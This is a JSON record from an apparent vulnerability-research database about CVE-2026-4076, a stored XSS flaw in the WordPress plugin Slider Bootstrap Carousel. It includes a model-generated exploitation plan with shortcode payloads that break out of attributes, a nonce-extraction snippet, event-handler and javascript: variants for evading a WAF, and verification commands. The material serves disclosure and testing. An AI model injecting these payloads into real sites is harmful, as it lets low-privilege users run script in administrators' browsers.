[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$flJXnXWuszO3E5JIy687nrQc7_PHikGLCYIZ-JYfyPgc":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":24,"research_started_at":25,"research_completed_at":26,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":27},"CVE-2026-4076","slider-bootstrap-carousel-authenticated-contributor-stored-cross-site-scripting-via-shortcode-attributes","Slider Bootstrap Carousel \u003C= 1.0.7 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes","The Slider Bootstrap Carousel plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'category' and 'template' shortcode attributes in all versions up to and including 1.0.7. This is due to insufficient input sanitization and output escaping on user-supplied shortcode attributes. The plugin uses extract() on shortcode_atts() to parse attributes, then directly outputs the $category variable into multiple HTML attributes (id, data-target, href) on lines 38, 47, 109, and 113 without applying esc_attr(). Similarly, the $template attribute flows into a class attribute on line 93 without escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","slider-bootstrap-carousel",null,"\u003C=1.0.7","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-21 19:06:36","2026-04-22 07:45:32",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F26fe0b7b-dbf8-467f-b5e2-86a858eeaf89?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-4076\n\n## 1. Vulnerability Summary\nThe **Slider Bootstrap Carousel** plugin for WordPress (versions \u003C= 1.0.7) is vulnerable to **Stored Cross-Site Scripting (XSS)** via shortcode attributes. The plugin uses `extract()` on the results of `shortcode_atts()` to process user-supplied attributes like `category` and `template`. These variables are subsequently echoed directly into HTML attributes (`id`, `data-target`, `href`, and `class`) within the frontend output without being passed through escaping functions like `esc_attr()`. This allows a user with **Contributor-level** permissions or higher to inject malicious JavaScript into a post or page, which will execute in the context of any user (including administrators) who views that content.\n\n## 2. Attack Vector Analysis\n*   **Shortcode Name:** `[slider-bootstrap-carousel]` (inferred from plugin slug).\n*   **Vulnerable Attributes:** `category` and `template`.\n*   **Authentication Level:** Authenticated (Contributor+). Contributors can create posts and insert shortcodes but lack the `unfiltered_html` capability, making this a privilege escalation in terms of script execution.\n*   **Endpoint:** Post\u002FPage editor (`\u002Fwp-admin\u002Fpost-new.php` or `\u002Fwp-admin\u002Fpost.php`).\n*   **Payload Delivery:** The payload is embedded within the shortcode attributes saved in the `post_content` field of a WordPress post.\n*   **Sink Contexts:**\n    *   `category`: Echoed into `id`, `data-target`, and `href`.\n    *   `template`: Echoed into a `class` attribute.\n\n## 3. Code Flow\n1.  **Entry Point:** A user with Contributor permissions saves a post containing the shortcode: `[slider-bootstrap-carousel category='payload']`.\n2.  **Shortcode Registration:** The plugin registers the shortcode (likely in the main file or a shortcode-specific include) using `add_shortcode()`.\n3.  **Parsing (Vulnerable):** The callback function for the shortcode uses `shortcode_atts()` to define defaults and then `extract()` to turn keys into local variables.\n    ```php\n    \u002F\u002F Representative vulnerable code pattern\n    function slider_shortcode_callback( $atts ) {\n        extract( shortcode_atts( array(\n            'category' => '',\n            'template' => 'default',\n        ), $atts ) );\n        \u002F\u002F ...\n    ```\n4.  **Execution\u002FSink:**\n    *   **Line 38\u002F47\u002F109\u002F113:** The `$category` variable is echoed into attributes:\n        `\u003Cdiv id=\"\u003C?php echo $category; ?>\" data-target=\"#\u003C?php echo $category; ?>\">`\n        `\u003Ca href=\"#\u003C?php echo $category; ?>\">`\n    *   **Line 93:** The `$template` variable is echoed into a class:\n        `\u003Cdiv class=\"carousel \u003C?php echo $template; ?>\">`\n5.  **Output:** Since no `esc_attr()` or `sanitize_text_field()` is applied, the payload breaks out of the HTML attribute and injects a script tag.\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability is exploited by saving a standard WordPress post\u002Fpage. There are no plugin-specific nonces required to trigger the shortcode processing. \n\nTo save the post as a Contributor:\n1.  Use `browser_navigate` to go to `\u002Fwp-admin\u002Fpost-new.php`.\n2.  The standard WordPress `_wpnonce` and `_wp_http_referer` are generated by the core post editor.\n3.  The PoC agent should use `browser_type` or `browser_click` to interact with the editor and save the post, or extract the `_wpnonce` from the page source if attempting a direct `http_request` to `wp-admin\u002Fpost.php`.\n\n**Variable extraction for Post Nonce:**\n```javascript\n\u002F\u002F To be run via browser_eval on the post-new.php page\nwindow._wpnonce || document.querySelector('#_wpnonce')?.value\n```\n\n## 5. Exploitation Strategy\n1.  **Authentication:** Log in to the WordPress instance as a **Contributor**.\n2.  **Payload Preparation:**\n    *   **Payload A (Category):** `\">\u003Cscript>alert('XSS_CATEGORY')\u003C\u002Fscript>`\n    *   **Payload B (Template):** `\">\u003Cscript>alert('XSS_TEMPLATE')\u003C\u002Fscript>`\n3.  **Post Creation:**\n    *   Create a new post.\n    *   Set the content to: `[slider-bootstrap-carousel category='\">\u003Cscript>alert(\"XSS_CATEGORY\")\u003C\u002Fscript>' template='\">\u003Cscript>alert(\"XSS_TEMPLATE\")\u003C\u002Fscript>']`\n    *   Publish\u002FSubmit the post for review.\n4.  **Triggering:**\n    *   Log in as an **Administrator**.\n    *   Navigate to the URL of the newly created post (or view it in the preview).\n5.  **Verification:** Check if the browser executes the `alert()` calls.\n\n## 6. Test Data Setup\n*   **User:** Create a user with the username `contributor_test` and role `contributor`.\n*   **Plugin:** Ensure `slider-bootstrap-carousel` version \u003C= 1.0.7 is installed and active.\n*   **Post Content:**\n    ```text\n    Check out this carousel:\n    [slider-bootstrap-carousel category='carousel-1\">\u003Cscript>console.log(\"CVE-2026-4076-CAT\")\u003C\u002Fscript>' template='tpl\">\u003Cscript>console.log(\"CVE-2026-4076-TPL\")\u003C\u002Fscript>']\n    ```\n\n## 7. Expected Results\n*   When the post is rendered, the HTML source should look similar to:\n    ```html\n    \u003Cdiv id=\"carousel-1\">\u003Cscript>console.log(\"CVE-2026-4076-CAT\")\u003C\u002Fscript>\" data-target=\"#carousel-1...\n    \u003Cdiv class=\"carousel tpl\">\u003Cscript>console.log(\"CVE-2026-4076-TPL\")\u003C\u002Fscript>\">\n    ```\n*   The browser console should show `CVE-2026-4076-CAT` and `CVE-2026-4076-TPL`.\n\n## 8. Verification Steps\n1.  **Database Check:** Verify the payload is stored in the `wp_posts` table.\n    ```bash\n    wp db query \"SELECT post_content FROM wp_posts WHERE post_title='XSS Test Post'\"\n    ```\n2.  **HTML Inspection:** Use `http_request` to fetch the post content and grep for the raw payload.\n    ```bash\n    # Assuming post ID is 123\n    http_request GET \"\u002F?p=123\" | grep \"script\"\n    ```\n3.  **Role Verification:** Confirm the user who created the post does *not* have `unfiltered_html`.\n    ```bash\n    wp user cap list contributor_test | grep unfiltered_html\n    ```\n    *(Expected: empty output)*\n\n## 9. Alternative Approaches\n*   **Event Handler Injection:** If `\u003Cscript>` tags are stripped by a WAF, use event handlers:\n    `category='x\" onmouseover=\"alert(1)\" x=\"'`\n*   **Attribute Breakout:** If the plugin wraps values in single quotes instead of double quotes, adjust the payload:\n    `category=\"x'>\u003Cscript>alert(1)\u003C\u002Fscript>\"`\n*   **URL-based Trigger:** If the `category` attribute is used inside an `href` as `href=\"#$category\"`, try the `javascript:` protocol:\n    `category='javascript:alert(1)'` (Note: `href=\"#javascript:...\"` might fail, so breakout is preferred).","gemini-3-flash-preview","2026-04-27 14:00:22","2026-04-27 14:00:42",{"type":28,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":29},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fslider-bootstrap-carousel\u002Ftags"]